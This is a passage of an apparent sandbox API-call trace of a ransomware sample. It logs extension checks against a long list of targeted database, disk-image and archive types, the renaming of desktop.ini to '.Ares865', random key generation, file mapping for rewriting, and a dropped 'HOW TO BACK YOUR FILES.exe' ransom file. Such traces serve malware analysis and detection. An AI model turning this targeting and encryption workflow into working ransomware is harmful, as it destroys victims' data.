(lpString=".sys") returned 4 [0068.411] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0068.411] lstrlenW (lpString="desktop.ini") returned 11 [0068.411] lstrlenW (lpString="bak") returned 3 [0068.411] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0068.411] lstrlenW (lpString="ba_") returned 3 [0068.412] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0068.412] lstrlenW (lpString="dbb") returned 3 [0068.412] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0068.412] lstrlenW (lpString="vmdk") returned 4 [0068.412] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0068.412] lstrlenW (lpString="rar") returned 3 [0068.412] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0068.412] lstrlenW (lpString="zip") returned 3 [0068.412] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0068.412] lstrlenW (lpString="tgz") returned 3 [0068.412] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0068.412] lstrlenW (lpString="vbox") returned 4 [0068.412] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0068.412] lstrlenW (lpString="vdi") returned 3 [0068.412] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0068.412] lstrlenW (lpString="vhd") returned 3 [0068.412] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0068.412] lstrlenW (lpString="vhdx") returned 4 [0068.412] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0068.412] lstrlenW (lpString="avhd") returned 4 [0068.412] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0068.412] lstrlenW (lpString="db") returned 2 [0068.412] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0068.412] lstrlenW (lpString="db2") returned 3 [0068.412] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0068.412] lstrlenW (lpString="db3") returned 3 [0068.412] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0068.412] lstrlenW (lpString="dbf") returned 3 [0068.412] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0068.412] lstrlenW (lpString="mdf") returned 3 [0068.412] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0068.412] lstrlenW (lpString="mdb") returned 3 [0068.412] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0068.412] lstrlenW (lpString="sql") returned 3 [0068.412] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0068.412] lstrlenW (lpString="sqlite") returned 6 [0068.412] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0068.412] lstrlenW (lpString="sqlite3") returned 7 [0068.413] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0068.413] lstrlenW (lpString="sqlitedb") returned 8 [0068.413] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0068.413] lstrlenW (lpString="xml") returned 3 [0068.413] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0068.413] lstrlenW (lpString="$er") returned 3 [0068.413] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0068.413] lstrlenW (lpString="4dd") returned 3 [0068.413] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0068.413] lstrlenW (lpString="4dl") returned 3 [0068.413] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0068.413] lstrlenW (lpString="^^^") returned 3 [0068.413] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0068.413] lstrlenW (lpString="abs") returned 3 [0068.413] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0068.413] lstrlenW (lpString="abx") returned 3 [0068.413] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0068.413] lstrlenW (lpString="accdb") returned 5 [0068.413] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0068.413] lstrlenW (lpString="accdc") returned 5 [0068.413] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0068.413] lstrlenW (lpString="accde") returned 5 [0068.413] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0068.413] lstrlenW (lpString="accdr") returned 5 [0068.413] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0068.413] lstrlenW (lpString="accdt") returned 5 [0068.413] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0068.413] lstrlenW (lpString="accdw") returned 5 [0068.413] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0068.413] lstrlenW (lpString="accft") returned 5 [0068.413] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0068.413] lstrlenW (lpString="adb") returned 3 [0068.413] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0068.413] lstrlenW (lpString="adb") returned 3 [0068.413] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0068.413] lstrlenW (lpString="ade") returned 3 [0068.413] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0068.413] lstrlenW (lpString="adf") returned 3 [0068.414] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0068.414] lstrlenW (lpString="adn") returned 3 [0068.414] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0068.414] lstrlenW (lpString="adp") returned 3 [0068.414] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0068.414] lstrlenW (lpString="alf") returned 3 [0068.414] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0068.414] lstrlenW (lpString="ask") returned 3 [0068.414] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0068.414] lstrlenW (lpString="btr") returned 3 [0068.414] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0068.414] lstrlenW (lpString="cat") returned 3 [0068.414] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0068.414] lstrlenW (lpString="cdb") returned 3 [0068.414] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0068.414] lstrlenW (lpString="ckp") returned 3 [0068.414] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0068.414] lstrlenW (lpString="cma") returned 3 [0068.414] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0068.414] lstrlenW (lpString="cpd") returned 3 [0068.414] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0068.414] lstrlenW (lpString="dacpac") returned 6 [0068.414] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0068.414] lstrlenW (lpString="dad") returned 3 [0068.414] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0068.414] lstrlenW (lpString="dadiagrams") returned 10 [0068.414] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0068.414] lstrlenW (lpString="daschema") returned 8 [0068.414] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0068.414] lstrlenW (lpString="db-journal") returned 10 [0068.414] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0068.414] lstrlenW (lpString="db-shm") returned 6 [0068.414] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0068.414] lstrlenW (lpString="db-wal") returned 6 [0068.414] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0068.414] lstrlenW (lpString="dbc") returned 3 [0068.414] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0068.414] lstrlenW (lpString="dbs") returned 3 [0068.414] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0068.415] lstrlenW (lpString="dbt") returned 3 [0068.415] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0068.415] lstrlenW (lpString="dbv") returned 3 [0068.415] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0068.415] lstrlenW (lpString="dbx") returned 3 [0068.415] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0068.415] lstrlenW (lpString="dcb") returned 3 [0068.415] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0068.415] lstrlenW (lpString="dct") returned 3 [0068.415] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0068.415] lstrlenW (lpString="dcx") returned 3 [0068.415] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0068.415] lstrlenW (lpString="ddl") returned 3 [0068.415] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0068.415] lstrlenW (lpString="dlis") returned 4 [0068.415] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0068.415] lstrlenW (lpString="dp1") returned 3 [0068.415] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0068.415] lstrlenW (lpString="dqy") returned 3 [0068.415] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0068.415] lstrlenW (lpString="dsk") returned 3 [0068.415] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0068.415] lstrlenW (lpString="dsn") returned 3 [0068.415] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0068.415] lstrlenW (lpString="dtsx") returned 4 [0068.415] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0068.415] lstrlenW (lpString="dxl") returned 3 [0068.415] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0068.415] lstrlenW (lpString="eco") returned 3 [0068.415] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0068.415] lstrlenW (lpString="ecx") returned 3 [0068.415] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0068.415] lstrlenW (lpString="edb") returned 3 [0068.415] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0068.415] lstrlenW (lpString="epim") returned 4 [0068.415] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0068.416] lstrlenW (lpString="fcd") returned 3 [0068.416] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0068.416] lstrlenW (lpString="fdb") returned 3 [0068.416] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0068.416] lstrlenW (lpString="fic") returned 3 [0068.416] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0068.416] lstrlenW (lpString="flexolibrary") returned 12 [0068.416] lstrlenW (lpString="fm5") returned 3 [0068.416] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0068.416] lstrlenW (lpString="fmp") returned 3 [0068.416] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0068.416] lstrlenW (lpString="fmp12") returned 5 [0068.416] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0068.416] lstrlenW (lpString="fmpsl") returned 5 [0068.416] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0068.416] lstrlenW (lpString="fol") returned 3 [0068.416] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0068.416] lstrlenW (lpString="fp3") returned 3 [0068.416] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0068.416] lstrlenW (lpString="fp4") returned 3 [0068.416] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0068.416] lstrlenW (lpString="fp5") returned 3 [0068.416] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0068.416] lstrlenW (lpString="fp7") returned 3 [0068.416] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0068.416] lstrlenW (lpString="fpt") returned 3 [0068.416] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0068.416] lstrlenW (lpString="frm") returned 3 [0068.416] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0068.416] lstrlenW (lpString="gdb") returned 3 [0068.416] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0068.416] lstrlenW (lpString="gdb") returned 3 [0068.416] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0068.416] lstrlenW (lpString="grdb") returned 4 [0068.416] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0068.416] lstrlenW (lpString="gwi") returned 3 [0068.416] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0068.417] lstrlenW (lpString="hdb") returned 3 [0068.417] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0068.417] lstrlenW (lpString="his") returned 3 [0068.417] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0068.417] lstrlenW (lpString="ib") returned 2 [0068.417] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0068.417] lstrlenW (lpString="idb") returned 3 [0068.417] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0068.417] lstrlenW (lpString="ihx") returned 3 [0068.417] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0068.417] lstrlenW (lpString="itdb") returned 4 [0068.417] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0068.417] lstrlenW (lpString="itw") returned 3 [0068.417] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0068.417] lstrlenW (lpString="jet") returned 3 [0068.417] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0068.417] lstrlenW (lpString="jtx") returned 3 [0068.417] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0068.417] lstrlenW (lpString="kdb") returned 3 [0068.417] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0068.417] lstrlenW (lpString="kexi") returned 4 [0068.417] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0068.417] lstrlenW (lpString="kexic") returned 5 [0068.417] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0068.417] lstrlenW (lpString="kexis") returned 5 [0068.417] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0068.417] lstrlenW (lpString="lgc") returned 3 [0068.417] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0068.417] lstrlenW (lpString="lwx") returned 3 [0068.417] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0068.417] lstrlenW (lpString="maf") returned 3 [0068.417] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0068.417] lstrlenW (lpString="maq") returned 3 [0068.417] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0068.417] lstrlenW (lpString="mar") returned 3 [0068.417] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0068.417] lstrlenW (lpString="marshal") returned 7 [0068.417] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0068.417] lstrlenW (lpString="mas") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0068.418] lstrlenW (lpString="mav") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0068.418] lstrlenW (lpString="maw") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0068.418] lstrlenW (lpString="mdbhtml") returned 7 [0068.418] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0068.418] lstrlenW (lpString="mdn") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0068.418] lstrlenW (lpString="mdt") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0068.418] lstrlenW (lpString="mfd") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0068.418] lstrlenW (lpString="mpd") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0068.418] lstrlenW (lpString="mrg") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0068.418] lstrlenW (lpString="mud") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0068.418] lstrlenW (lpString="mwb") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0068.418] lstrlenW (lpString="myd") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0068.418] lstrlenW (lpString="ndf") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0068.418] lstrlenW (lpString="nnt") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0068.418] lstrlenW (lpString="nrmlib") returned 6 [0068.418] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0068.418] lstrlenW (lpString="ns2") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0068.418] lstrlenW (lpString="ns3") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0068.418] lstrlenW (lpString="ns4") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0068.418] lstrlenW (lpString="nsf") returned 3 [0068.418] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0068.418] lstrlenW (lpString="nv") returned 2 [0068.419] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0068.419] lstrlenW (lpString="nv2") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0068.419] lstrlenW (lpString="nwdb") returned 4 [0068.419] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0068.419] lstrlenW (lpString="nyf") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0068.419] lstrlenW (lpString="odb") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0068.419] lstrlenW (lpString="odb") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0068.419] lstrlenW (lpString="oqy") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0068.419] lstrlenW (lpString="ora") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0068.419] lstrlenW (lpString="orx") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0068.419] lstrlenW (lpString="owc") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0068.419] lstrlenW (lpString="p96") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0068.419] lstrlenW (lpString="p97") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0068.419] lstrlenW (lpString="pan") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0068.419] lstrlenW (lpString="pdb") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0068.419] lstrlenW (lpString="pdm") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0068.419] lstrlenW (lpString="pnz") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0068.419] lstrlenW (lpString="qry") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0068.419] lstrlenW (lpString="qvd") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0068.419] lstrlenW (lpString="rbf") returned 3 [0068.419] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0068.419] lstrlenW (lpString="rctd") returned 4 [0068.419] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0068.420] lstrlenW (lpString="rod") returned 3 [0068.420] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0068.420] lstrlenW (lpString="rodx") returned 4 [0068.420] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0068.420] lstrlenW (lpString="rpd") returned 3 [0068.420] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0068.420] lstrlenW (lpString="rsd") returned 3 [0068.420] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0068.420] lstrlenW (lpString="sas7bdat") returned 8 [0068.420] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0068.420] lstrlenW (lpString="sbf") returned 3 [0068.420] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0068.420] lstrlenW (lpString="scx") returned 3 [0068.420] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0068.420] lstrlenW (lpString="sdb") returned 3 [0068.420] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0068.420] lstrlenW (lpString="sdc") returned 3 [0068.420] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0068.420] lstrlenW (lpString="sdf") returned 3 [0068.420] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0068.420] lstrlenW (lpString="sis") returned 3 [0068.420] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0068.420] lstrlenW (lpString="spq") returned 3 [0068.420] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0068.420] lstrlenW (lpString="te") returned 2 [0068.420] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0068.420] lstrlenW (lpString="teacher") returned 7 [0068.420] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0068.420] lstrlenW (lpString="tmd") returned 3 [0068.420] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0068.420] lstrlenW (lpString="tps") returned 3 [0068.420] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0068.420] lstrlenW (lpString="trc") returned 3 [0068.420] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0068.420] lstrlenW (lpString="trc") returned 3 [0068.420] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0068.420] lstrlenW (lpString="trm") returned 3 [0068.420] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0068.420] lstrlenW (lpString="udb") returned 3 [0068.421] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0068.421] lstrlenW (lpString="udl") returned 3 [0068.421] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0068.421] lstrlenW (lpString="usr") returned 3 [0068.421] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0068.421] lstrlenW (lpString="v12") returned 3 [0068.421] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0068.421] lstrlenW (lpString="vis") returned 3 [0068.421] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0068.421] lstrlenW (lpString="vpd") returned 3 [0068.421] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0068.421] lstrlenW (lpString="vvv") returned 3 [0068.421] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0068.421] lstrlenW (lpString="wdb") returned 3 [0068.421] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0068.421] lstrlenW (lpString="wmdb") returned 4 [0068.421] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0068.421] lstrlenW (lpString="wrk") returned 3 [0068.421] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0068.421] lstrlenW (lpString="xdb") returned 3 [0068.421] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0068.421] lstrlenW (lpString="xld") returned 3 [0068.421] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0068.421] lstrlenW (lpString="xmlff") returned 5 [0068.421] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0068.421] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\desktop.ini.Ares865") returned 89 [0068.421] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\desktop.ini" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\desktop.ini"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0068.422] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\windows powershell\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0068.422] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=216) returned 1 [0068.422] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0068.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0068.423] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0068.423] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.423] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.424] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e0, lpName=0x0) returned 0x15c [0068.434] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e0) returned 0x190000 [0068.435] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0068.435] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.435] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.435] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0068.435] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0068.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0068.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0068.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.436] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0068.436] CloseHandle (hObject=0x15c) returned 1 [0068.436] CloseHandle (hObject=0x154) returned 1 [0068.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0068.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0068.437] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bbcba20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bbcba20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0068.437] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0068.437] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8038cbd7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bef7178, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bef7178, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x7c5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows PowerShell (x86).lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0068.437] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.437] lstrcmpiW (lpString1="Windows PowerShell (x86).lnk", lpString2="aoldtz.exe") returned 1 [0068.437] 